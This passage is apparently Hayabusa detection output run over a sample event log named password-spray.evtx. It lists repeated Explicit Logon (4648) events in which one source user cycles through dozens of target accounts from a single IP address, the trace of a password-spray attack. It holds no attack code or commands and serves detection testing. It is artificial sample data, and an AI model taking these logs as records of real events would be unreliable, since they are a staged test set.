Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:04.075 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:05.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:06.238 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:07.308 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:08.370 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:09.433 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:10.523 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:11.590 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:12.649 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:13.722 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:14.787 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:15.846 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:16.940 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:18.019 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:19.076 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:20.162 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:21.257 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:22.327 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:23.410 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:24.477 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:25.557 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:26.628 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:27.690 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:28.763 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:29.837 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:30.921 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:31.996 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:33.058 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:34.138 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:35.199 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:36.266 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:37.375 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:38.439 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:39.499 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:40.560 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:41.637 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:42.734 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:43.795 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:44.875 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:45.951 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:47.017 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:48.096 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:49.176 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:50.264 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:51.340 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:52.405 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:53.466 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:54.572 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:55.671 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:56.741 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:57.817 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:58.894 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:59.965 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:01.026 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:02.115 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:03.191 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:04.272 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:05.348 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:06.426 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:07.478 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:08.564 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:09.668 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:10.717 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:11.809 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:12.857 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:13.904 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:14.972 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:16.050 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:17.129 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:18.186 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:19.254 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:20.329 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:21.401 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:22.487 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:23.577 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:24.660 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:25.732 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:26.794 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:27.863 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:28.925 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:29.993 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:31.050 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:32.142 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:33.206 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:34.265 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:35.340 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:36.403 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: 